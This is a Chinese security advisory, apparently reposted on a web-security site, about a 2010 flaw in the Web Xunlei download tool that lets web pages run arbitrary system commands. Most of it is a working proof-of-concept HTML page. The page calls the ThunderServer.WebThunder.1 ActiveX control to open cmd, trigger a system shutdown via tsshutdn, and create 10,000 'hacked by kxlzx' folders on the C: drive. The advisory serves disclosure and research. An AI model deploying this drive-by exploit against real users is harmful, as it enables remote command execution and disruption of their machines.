web迅雷允许执行任意系统命令漏洞
web迅雷允许执行任意系统命令漏洞
发布日期:2010-10-24
更新日期:2011-04-26
受影响系统:
XunLei web迅雷
描述:
--------------------------------------------------------------------------------
Web迅雷是一款基于多资源超线程技术的下载工具,它继承了迅雷5的操作方便、高速下载的特点外,同时使用全网页化的操作界面,更符合互联网用户使用习惯,是国内第一款网页上的下载工具。
Web迅雷在实现上存在设计漏洞,程序会接收攻击者提供的恶意参数直接执行,远程攻击者可利用此漏洞控制用户受影响系统。
<*来源:kxlzx
链接:http://www.inbreak.net/archives/165
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
- <html>
- <head>
- <title>迅雷执行任意系统命令</title>
- </head>
- <body>
- 运行迅雷加载项。
- <script>
- /**
- *by kxlzx
- */
- server = new ActiveXObject("ThunderServer.WebThunder.1");
- if(server==null)
- {
- alert("没装迅雷,请安装web迅雷");
- window.location.href="http://dl.xunlei.com/wxl.html";
- }else{
- server.OpenDirectory("cmd");
- alert("要我帮你关机么?");
- alert("哎呀呀!悲剧啊!你怎么不小心点了确定了?");
- server.OpenDirectory("tsshutdn");
- //创建无数文件夹
- j = 10000;
- for(i=0;i<j;i++){
- server.CreatePathTree("c:\\hacked by kxlzx "+i);
- }
- setTimeout("alert('还愣着?赶快保存啊!')",50000);
- }
- </script>
- </body>
- </html>
复制代码建议:
--------------------------------------------------------------------------------
厂商补丁:
XunLei
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论